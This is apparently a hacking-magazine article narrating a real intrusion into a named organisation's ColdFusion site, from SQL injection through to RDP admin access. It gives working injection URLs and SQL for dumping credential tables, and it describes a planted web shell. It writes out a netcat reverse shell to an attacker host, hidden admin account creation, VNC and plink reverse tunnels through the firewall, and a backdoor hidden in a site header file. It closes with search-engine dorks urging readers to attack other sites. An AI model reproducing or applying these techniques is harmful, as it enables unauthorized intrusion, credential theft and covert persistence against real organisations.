7 steps from Injection to the Admin Access via RDP

Any break-in pursues its own aim, which determines its value. It's up to you to decide whether to deface a site for the latent risqu things
lovers or to screw up another root shell. The reality is that any vulnerability in a web application poses a threat to the server. And if you
don't confine yourself to the trite and somewhat boring SQL injections so this article is right for you. The victim's address is at input, the
admin access via RDP is at output these are classics of penetration!

The Prelude, or How It All Began

And the beginning was trivial. At first there was a URL. For some reason someone was very interested in this URL, and I had to see what
could be done to it. The URL at once got to Firefox, which quickly delivered a result: an institute or something of the kind, heaps of links,
news, a menu and other garbage. My mouse was quickly jumping from one link to another, and my spirits were slowly rising. I've always
liked sites with a huge amount of question marks, parameters such as id and numerical values in links... And to tell the truth the site was
stuffed with such things not less than a dump with trash.

Having looked upon the icon of my favourite scanner I grinned and decided however not to bother the admins but to turn to the Great
Index and solve everything quietly and peacefully. So, here goes a magic phrase insite:ism.ws, then a Search button and... may we say
the thing is over?

About 10,000 results given by Google promised a laborious task. Firefox quickly acquired tabs, to which flew all sorts of quotation
marks, equations, hyphens, and other evil spirits.

Chapter 1, or All of Us are Sinful

The practice shows that almost every big resource has injections. For sure there is at least one small, invisible and filterable injection. One
just has to look closely. And the cherished fruit was found at the following address:

http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464

Everything turned out to be so trivial, that there was no doubt about the success of the subsequent activities. The familiar blue-grey
ColdFusion error page appeared in front of me and showed the full SQL-query and DBMS type (SQL Server), and script's local address.
Generally speaking the self-descriptiveness of errors delivered by ColdFusion is just amazing, - even the full call stack is given, more than
one could ever take.

Chapter 2, or Long Live the Errors

icrosoft DB server has always amazed me by its capabilities. I'm not talking about standards which all DBMS developers interpret in their
own way. However guys from Microsoft follow their own, unknown to the others way. For example I like to work with a SQL server. You
don't need to select the number of columns or their types, you just cause a conversion error and the answer will contain the full
information from the base as on a silver plate. It's very convenient! At first we'll check the output capability:

http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464+or+1= (select+@@version%2bchar(58)%2bdb_name()
%2bchar(58)%2bsystem_user%2bchar(58)%2b@@servername)--

In response we get the following error:

[Macromedia][SQLServer JDBC Driver][SQLServer]

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2050 (Intel
X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on
Windows NT 5.0 (Build 2195: Service Pack 4) :RDCMS-ISM-Core:rms:ISMSQL01' to a column of
data type int.

Thus we have a not too fresh server and the RDCMS-ISM-Core base. Having looked at them closely I almost jumped up with joy: the
CMS abbreviation was clearly giving to understand that this site had been tossed off not on one's laps but some big and respectful
company had written this wonder and made lots of money. But we'll talk about it a bit later. The DB structure is next in turn.

At this stage I don't like the brainchild of Microsoft that much. Not only did the developers not find time to create a normal results paging
but they also did not manage to implement row_number Windows 2000 server. So, a cool erotic adventure using the TOP construction is
waiting for us. TOP is a trick which allows to get several first entries upon query. But it is impossible to indicate the entry to begin with,
and this is very inconvenient taking into consideration the circumstances of our unreal hacking. Of course one may follow the standard
way: to get one entry by another, memorize and omit them during the following queries. But I don't get off on this method because it is
hardly automated and the URL is not long enough so it will fail for the large databases.

That's why we'll deceive everybody. We'll sort up and down and get an acceptable paging. We'll spare the server and add the field name
checking conditions let them contain some passwords. And for the process to be ultimately cool let's first of all determine their amount
(query samples are given below). So, it's 9 of them. Let's go!

The ES_LoginInfo (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) table at once caught my eye. Well, one may rub his hands and
order a pizza. But nothing of the sort. Having determined the table structure I got the following picture. Three interesting fields were
present in the table: EntityID, Username and Password. I think there is no need to explain that I quickly made a new query series and saw
the users' data. The passwords were available and I could rush at breakneck speed to the site for the desired admin panel. By the way
when I reached the sources I could hardly understand why the passwords had not been enciphered when the CMS developers had
provided for it (SHA-1, SHA-512, MD5) and even had implemented their own algorithm (iMIS). But okay I logged in, examined the site
and returned to the dump of the database structure because 8 more tables had fields with the passwords.

How Paging Can Be Done?

Every hacker dreams of getting all the data from a database upon one query. However life sets its own conditions and as a
rule a hacker has to get information line by line. But the trouble is that each of the DBMS developers decided to worsen
the situation in his own way. So, let's talk about the schemes of data paging.

1. MySQL. It offers the following construction: limit [offset, ]rowcount. Choose rowcount (in our case it's 1)
starting with the offset row. Well done!
2. Oracle. Use the pseudo column rownum. The problem is that rownum is generated automatically and it is
impossible, for example, to set a condition like rownum=n. Such a query will return an empty result. One
cannot do without subqueries here:

select fieldname from (select a.fieldname, rownum r from (select fieldname

from tablename) as a where r=<offset>)

3. SQL Server 2005. Here we choose a standard way: use row_number(). For example:

select field1, field2 from (select row_number() over (order by a.field1) as

r, a.field1, a.field2 from (select field1, field2 from tablename) as a) as
b where r=<offset>

4. SQL Server 2000. The situation is tough here: we've got only TOP. Let's apply such a secret: if we need to
choose an entry which number is offset first let's choose TOP <offset> of entries with an ascending sort, and
then choose the first entry with a descending sort out of the returned result. As a result the last row becomes the
first one and the thing is done. But you need to remember that in order to get a correct result you should sort
all the fields in the query.

Chapter 3, or Access is Gained

The next table to attract my attention was a SM_Sites table which contained a column, and its uncomplicated name was FTPPassword. As
it turned out the table also contained the FTPUserName and FTPServer columns. Having gathered the data from the table I saw that
ftp.rd.net and ftp2.rd.net were used as servers. The developers' site is hosted exactly at the rd.net address and it was found out that CMS
itself has a proud name of Results Direct. I never understood why the account data was kept in the base, but the data fit the ftp server. And
the account named ism.ws.prod.code evoke optimistic ideas which by the way were confirmed soon. The FTP root resembled the root of
the site itself. Having tested the availability of several scripts I finally established the fact of folders and files mapping. The FTP access
opened new ways to uploading files to the server and saved from the inevitable difficulties connected with digging out the functional of
the admin panel and searching ways to get the shell.

Chapter 4, or ColdFusion
I suppose everybody knows what to do with FTP. An idea to support the commands execution on the server and to get out of tight
embrace of a web application at once crosses one's mind. Obviously we need a web shell which will allow to wander about the server and
execute commands. But the trouble is that no trace of PHP or Perl at worst was detected. And it means that the moment of truth has come:
we'll have to program in ColdFusion. According to the developers this environment is very flexible and easy to master but for some
reason I don't like it at all. So, we'll Google the topic of web shells and terribly fail. All links were leading to one and the same plain piece
of code which can only execute commands. Well okay let's complement and add this and that, we only need to use the equipment. Some
time was spent on a really cool development which resulted in two offsprings. The first one shows us dirs and files, the second one listens
to us and follows our orders.

The files quickly took their places. Soon after I understood that I'd gained privileges of the SYSTEM account, and it was really cool. I just
could not rest on my laurels.

Chapter 5, or Blackle
The web shell is for sure a great thing but it is not as convenient as it may seem. We need to take the bull by its horns and get a normal
console. The Total at once applied netcat to the FTP. Netcat was launched on the Dedicated Server in promiscuous mode: "nc.exe l p
1234". The following command was executed: "cmd /c nc.exe m0r0superdedik.com 1234 e cmd". The shot was fired
and the shell was put to the consoles. Having examined the file system and launched something about ten utilities, I decided that Windows
without windows was a disaster. In 1999 there were no monads, I loathed to install anything, however for some reason the server
managing was very inconvenient. The Netstat showed port 3389, and my eyes shone with joy. The very important and needful commands
flew to the shell.

net user st password /add

net localgroup Administrators st /add

Though the mstsc command execution lead to a total failure because there arrived a message telling that the host was unavailable. NMAP
disappointed me more than the previous one, because only port 80 and port 25 turned out to be opened. The host was obviously protected
by the Firewall and port 3389 was trivially blocked. I did not want to give up, so I quickly made a list of the possible means of getting the
graphic interface:

VNC;
PPTP;
SSH.

Chapter 6, or Hello, Windows

The main problem was to organize the outcoming connection to our Dedicated Server. The netcat experience had clearly shown that the
ports were blocked only for the incoming connections so the organization of the outcoming connection from some graphic control system
would certainly give an opportunity to manage the server. Of course the choice fell on VNC. The VNC deployment scheme is in general
pretty simple (for TightVNC, for example):

1. Upload winvnc.exe and wm_hooks.dll to the server.

2. Install and start the VNC server.
winvnc.exe install
net start "VNC Server"
3. Start the client on the Dedicated Server in promiscuous mode.
4. Execute the reverse-connect command.
winvnc.exe connect <host>:<port>.

We've done almost everything except for one small detail. That was the access to the desktop. All my cherished hopes started fading
because the shell had the SYSTEM account privileges. We would not have even tried if we had not been hackers, but, just as had been
expected, all the attempts failed. I even tried Metasploit with the windows/vncinject/reverse_tcp payload (it's a very slow thing) but the
Great Framework did not help either. The principle of the VNC deployment to the server via a non-interactive shell and having no access
to the desktop stayed unknown. In fact I even was glad why did we have to use VNC if there was RDP? We only had to get through the
Firewall.

The brilliant idea concerning PPTP is to establish a PPTP connection to our Dedicated Server and then to address the node via the
intrinsic addressing with the tunneling of the traffic through the Firewall. In Windows all the connections are adapted graphically but
there should be a way to work using a console. Start Procmon by Russinovich on the testing machine and monitor the register in a
moment when the client activates the connection to the net. The result just can not be interpreted logically because nothing interesting
happens to the register. Microsoft has surpassed itself. What was the use of creating a register if its own modules don't use it? They should
think it over in their spare time and meanwhile we found a phone book at C:\Documents and Settings\All Users\Application Data\
Microsoft\Network\Connections\Pbk\rasphone.pbk, in which actually the parameters of the connection to the Dial-up and VPN networks
were described. Establish a connection to the Dedicated Server (with the installed and adapted RRAS service) on the testing machine and
copy the received file (rasphone.pbk) to the cracked host. Then create the following command file:

rasdial connection_name user password

route add 0.0.0.0 mask 0.0.0.0 remotehostgateway

We need the second line to restore the route by default after the connection so that our Dedicated Server would not undertake for the
traffic routing. I open the .bat file and was just knocked out. I would never get my hand near the connection, the Firewall seemed to block
the outcoming connections on the basis of the protocol type. Our GPE-traffic had gotten to the Blacklist as well.

We had almost given way to despair but we didn't give up. To tell the truth we'd been that dumb for a pretty long time, because we had
had to turn to SSH for help right away. By the way it's a very high-end thing and this has been more than once discussed in ][. Not only
can we get a shell but also we can invent lots of other interesting things. Our last hope was to successfully take only three steps:

to launch SSH server on the Dedicated Server

to upload the SSH client to the node
to connect and create the needed port mapping

I can understand a lot of things but I don't know why in the 21st century Windows does not have a built-in SSH server. Well okay, we'll
choose anyone, all the more so there are lots of them. Of course our favourite PuTTY is used as the client. But it's not just PuTTY, it's the
magic one. If you remember when addressing a new node PuTTY sincerely suggests to store the signature in the cache. Our access to the
command line is not characterized by the interactivity, so we wouldn't be able to answer this question. It means that we need the signature
to be stored automatically, but PuTTY can't do that. Having googled a little bit we found Quest PuTTY 0.60_q1.129. It's the same plus
what we need!

Upload plink.exe to the server and execute the following command:

plink.exe -nc m0r0superdedik.com:22 -batch -pw password -R 3390:127.0.0.1:3389 -L

3390:127.0.0.1:3390 -l st -auto_store_key_in_cache m0r0superdedik

Check the SSH server consoles and get absolutely happy because the connection is established! Now start mstsc and connect to
localhost:3390. We see the entry window of Windows 2000. Enter the data added with the help of the net user administrator and enjoy
the graphics with the administrator's privileges. Hurrah, it's time to take a sip of a real rock'n'roll drink that is whisky and to celebrate the
success.

Chapter 7, or Let there be an Automation

At first sight everything's wonderful, but to open the web shell every time and start a command to connect via SSH on the next day had
become too tiresome. That's why the coolest ColdFusion shell was a little bit modified for the execution of the connection command
without any human participation. The shell modification code may be found on our DVD.

A piece of the code was hidden in the following file: header.cfm, which in its turn connects to almost any CMS files. Then create a simple
form, indicating any *.cfm file on the server and get a simple way of organizing RDP.

<form action="http://www.ism.ws/about/MediaRoom/RequestForm.cfm" method="POST">

<table>
<tr><td>IP:</td><td><input type="text" size="20" name="ip"
value="m0r0superdedik.com"></input></td></tr>
<tr><td>SSH-port:</td><td><input type="text" size="20" name="port"
value="22"></input></td></tr>
<tr><td>User:</td><td><input type="text" size="20" name="login"
value="st"></input></td></tr>
<tr><td>Password:</td><td><input type="text" size="20" name="password"
value="password"></input></td></tr>
<tr><td></td><td><input type="submit" value="GO!"></td></td>
</table>
</form>

The Epilogue, or Everything is Just Up to Begin

When the CMS developer's site was found I was eager to test its durability. The error in CMS was at the same place. But the SM_Sites
table contained only one empty entry, and my dreams about FTP did not come true. The passwords were enciphered apparently by that
very ominous iMIS (the length was 120 bits). I didn't feel like busying myself with it, so we decided to leave it for you. And in order to
receive a stimulus type inurl:navItemNumber in Google and 12000 entries will lure and inspire you to perform exploits.
Carry any work to completion even if it seems absolutely unreal, otherwise any initiative of yours becomes pointless. All the described
above actions were taken while listening to the music of Brahms (thanks to "_xCort_" from torrents.ru). Paraphrasing the words of the
Smoke Under Water program permanent dj Kirill Nemolyayev Listen to the classics and be happy!

WWW
To make the vulnerability search automated you may use the following products:

acunetix.com/vulnerability-scanner/ - Accunetix Web Vulnerability Scanner

ptsecurity.ru/xs7.asp Xspider.
cirt.net/nikto2 Nikto.
sensepost.com/research/wikto Wikto.

INFO
The process of manual retrieving the information from the DB is tiresome and thankless. Look closely at the automation means (or
develop your own product), for example, SIPT. IMHO the program often glitches, works in a single-flow way but it copes with its task
well.

Read the full version of the article in the June issue of HACKER.

WARNING
Warning: this material is provided for informational purposes only. Neither the author nor the editorial board is responsible for your
actions!